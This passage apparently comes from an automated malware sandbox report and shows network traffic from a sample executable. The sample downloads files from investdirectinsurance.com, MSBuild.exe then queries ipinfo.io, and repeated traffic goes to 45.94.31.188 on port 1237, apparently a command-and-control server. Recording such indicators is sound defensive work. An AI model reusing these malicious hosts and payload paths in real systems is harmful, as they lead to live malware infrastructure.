                            Jul 27, 2024 11:37:15.558523893 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.558600903 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.559916973 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.559936047 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.560003042 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.560009956 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.560050011 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.561181068 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.561197996 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.561261892 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.561269999 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.561310053 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.632184982 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.632258892 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.632322073 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:15.632342100 CEST44349707104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:15.632374048 CEST49707443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.026982069 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027019024 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027025938 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027040958 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027066946 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027498960 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027550936 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027678013 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027713060 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027728081 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027734041 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027755976 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027770042 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027970076 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.028031111 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.028263092 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.028315067 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.095069885 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.095149994 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.095155954 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.095179081 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.095201969 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.095222950 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.095396042 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.095451117 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.095458031 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.095501900 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.113780975 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.113837957 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.113857031 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.113872051 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.113897085 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.113915920 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.114012003 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.114063025 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.114068031 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.114116907 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.114495039 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.114578962 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.114708900 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.114763975 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115586042 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115598917 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115619898 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115650892 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115659952 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115689039 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115704060 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115710974 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115725994 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115755081 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115772009 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115972042 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.116029024 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.116797924 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.116844893 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.116858959 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.116859913 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.116877079 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.116895914 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.116931915 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.117233992 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.117304087 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.117311001 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.117557049 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.117860079 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.117907047 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.117925882 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.117933035 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.117961884 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.117979050 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118185997 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118235111 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118246078 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118252039 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118279934 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118300915 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118632078 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118700027 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118736982 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118788004 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118843079 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118891001 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.119091034 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.119138002 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184318066 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184382915 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184415102 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184439898 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184506893 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184506893 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184798002 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184845924 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184860945 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184870958 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184901953 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184921026 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.202430964 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.202486992 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.202534914 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.202543974 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.202594042 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203274965 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203322887 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203347921 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203355074 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203382969 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203416109 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203805923 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203850985 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203885078 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203891993 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203905106 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203952074 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.204696894 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.204749107 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.204782009 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.204788923 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.204829931 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.204845905 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.205101967 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.205188036 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.205194950 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.205244064 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.205250978 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.205272913 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.205296040 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.205322027 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.208375931 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.208421946 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.208472013 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.208478928 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.208504915 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.208547115 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.272464991 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.272546053 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.272564888 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.272578001 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.272633076 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.272640944 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.273082018 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.273143053 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.273164988 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.273169994 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.273231983 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.291114092 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.291161060 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.291193962 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.291202068 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.291229963 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.291249990 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.291733027 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.291806936 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.291814089 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.291871071 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292114019 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292172909 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292195082 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292200089 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292210102 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292233944 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292551041 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292608976 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292671919 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292726994 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292776108 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292840004 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.293324947 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.293396950 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.293875933 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.293943882 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.293951035 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.293962002 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.294009924 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.294646978 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.294694901 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.294733047 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.294739008 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.294765949 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.294781923 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.295460939 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.295523882 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.295548916 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.295557022 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.295583010 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.295603991 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361324072 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361367941 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361397982 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361407042 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361440897 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361460924 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361651897 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361716032 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361721992 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361752033 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361764908 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361820936 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.362323999 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.362340927 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.741442919 CEST49677443192.168.2.920.189.173.11
                            Jul 27, 2024 11:37:22.381575108 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.381620884 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:22.382088900 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.387310982 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.387330055 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:22.862433910 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:22.862629890 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.864921093 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.864929914 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:22.865164995 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:22.913286924 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.985685110 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:23.028501034 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:23.126501083 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:23.126580954 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:23.126982927 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:23.134958029 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:23.624733925 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:23.629785061 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:23.630028009 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:23.634955883 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:23.640016079 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:23.640140057 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:23.645078897 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:27.791723013 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:27.792152882 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:27.796665907 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:27.840562105 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:30.622243881 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:30.627443075 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:30.779949903 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:30.780024052 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:30.780818939 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:30.780836105 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:30.780925989 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:30.780925989 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:30.784181118 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:30.784280062 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:37.589663982 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:37.589752913 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:39.359124899 CEST12374970945.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:39.359205961 CEST497091237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:45.030026913 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:45.030164957 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:38:01.979331970 CEST4970580192.168.2.9199.232.214.172
                            Jul 27, 2024 11:38:01.985111952 CEST8049705199.232.214.172192.168.2.9
                            Jul 27, 2024 11:38:01.988653898 CEST4970580192.168.2.9199.232.214.172
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 27, 2024 11:37:13.061350107 CEST | 60068 | 53 | 192.168.2.9 | 1.1.1.1
Jul 27, 2024 11:37:13.077002048 CEST | 53 | 60068 | 1.1.1.1 | 192.168.2.9
Jul 27, 2024 11:37:16.127563000 CEST | 62156 | 53 | 192.168.2.9 | 1.1.1.1
Jul 27, 2024 11:37:16.134572029 CEST | 53 | 62156 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 27, 2024 11:37:13.061350107 CEST | 192.168.2.9 | 1.1.1.1 | 0x150d | Standard query (0) | investdirectinsurance.com | A (IP address) | IN (0x0001) | false
Jul 27, 2024 11:37:16.127563000 CEST | 192.168.2.9 | 1.1.1.1 | 0x641d | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 27, 2024 11:37:13.077002048 CEST | 1.1.1.1 | 192.168.2.9 | 0x150d | No error (0) | investdirectinsurance.com | | 104.21.65.79 | A (IP address) | IN (0x0001) | false
Jul 27, 2024 11:37:13.077002048 CEST | 1.1.1.1 | 192.168.2.9 | 0x150d | No error (0) | investdirectinsurance.com | | 172.67.189.102 | A (IP address) | IN (0x0001) | false
Jul 27, 2024 11:37:16.134572029 CEST | 1.1.1.1 | 192.168.2.9 | 0x641d | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Jul 27, 2024 11:37:30.816615105 CEST | 1.1.1.1 | 192.168.2.9 | 0xa17d | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Jul 27, 2024 11:37:30.816615105 CEST | 1.1.1.1 | 192.168.2.9 | 0xa17d | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Jul 27, 2024 11:37:43.360903025 CEST | 1.1.1.1 | 192.168.2.9 | 0xe49d | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Jul 27, 2024 11:37:43.360903025 CEST | 1.1.1.1 | 192.168.2.9 | 0xe49d | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                            • investdirectinsurance.com
                            • ipinfo.io
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jul 27, 2024 11:37:30.780836105 CEST | 23.206.229.209 | 443 | 192.168.2.9 | 49704 | CN=r.bing.com, O=Microsoft Corporation, L=Redmond, ST=WA, C=US | CN=Microsoft Azure ECC TLS Issuing CA 04, O=Microsoft Corporation, C=US | Mon Jun 24 18:16:15 CEST 2024 | Thu Jun 19 18:16:15 CEST 2025 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0 | 28a2c9bd18a11de089ef85a160da29e4
 | | | | | CN=Microsoft Azure ECC TLS Issuing CA 04, O=Microsoft Corporation, C=US | CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Jun 08 02:00:00 CEST 2023 | Wed Aug 26 01:59:59 CEST 2026 | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49706 | 104.21.65.79 | 443 | 7560 | C:\Users\user\Desktop\Mu7iyblZk8.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-27 09:37:13 UTC | 136 | OUT | GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1
                            User-Agent: Mozilla/5.0
                            Host: investdirectinsurance.com
                            Cache-Control: no-cache
2024-07-27 09:37:14 UTC | 677 | IN | HTTP/1.1 200 OK
                            Date: Sat, 27 Jul 2024 09:37:14 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 47616
                            Connection: close
                            etag: "ba00-66a2ddbd-31025;;;"
                            last-modified: Thu, 25 Jul 2024 23:20:29 GMT
                            accept-ranges: bytes
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4cQO%2F45RPQp0YH3QQFSUS4pPDpXunFmajZC0BnnJzfHuUO6pAjRpaxauY3pLIs0jiZ5QNVEe0K2uoGTeQ7jeYN4s4pksjmyLmwnDX8vOIgum61zzJiRfkQ5wz3LyXYtQMKW%2FHqkXX6syfO4j"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a9ba64dce9a8c60-EWR
                            alt-svc: h3=":443"; ma=86400


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.9 | 49707 | 104.21.65.79 | 443 | 7560 | C:\Users\user\Desktop\Mu7iyblZk8.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-27 09:37:14 UTC | 130 | OUT | GET /assuence/litesolidCha/Miox.bd HTTP/1.1
                            User-Agent: Mozilla/5.0
                            Host: investdirectinsurance.com
                            Cache-Control: no-cache
                            2024-07-27 09:37:15 UTC | 681 | IN | HTTP/1.1 200 OK
                            Date: Sat, 27 Jul 2024 09:37:15 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 549888
                            Connection: close
                            etag: "86400-66a37fb9-2699a;;;"
                            last-modified: Fri, 26 Jul 2024 10:51:37 GMT
                            accept-ranges: bytes
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQi7wg97weBTNKFR5a3%2BSi%2FqH4vk0qtKikuDjflcNjcgMNKVJ81vaXgKm5eWhSD2PYuVwW3hgQmAQxui8ZQqPPwa9AtlCj5BGy2%2FxC55TvAiPBltqkPj2LED7R37WlJFQRt5IrwAU3aSc4GQ"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a9ba6548fe917d9-EWR
                            alt-svc: h3=":443"; ma=86400


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            2 | 192.168.2.9 | 49708 | 34.117.59.81 | 443 | 7732 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-27 09:37:16 UTC | 63 | OUT | GET /json HTTP/1.1
                            Host: ipinfo.io
                            Connection: Keep-Alive
                            2024-07-27 09:37:17 UTC | 345 | IN | HTTP/1.1 200 OK
                            access-control-allow-origin: *
                            Content-Length: 319
                            content-type: application/json; charset=utf-8
                            date: Sat, 27 Jul 2024 09:37:17 GMT
                            x-content-type-options: nosniff
                            via: 1.1 google
                            strict-transport-security: max-age=2592000; includeSubDomains
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close
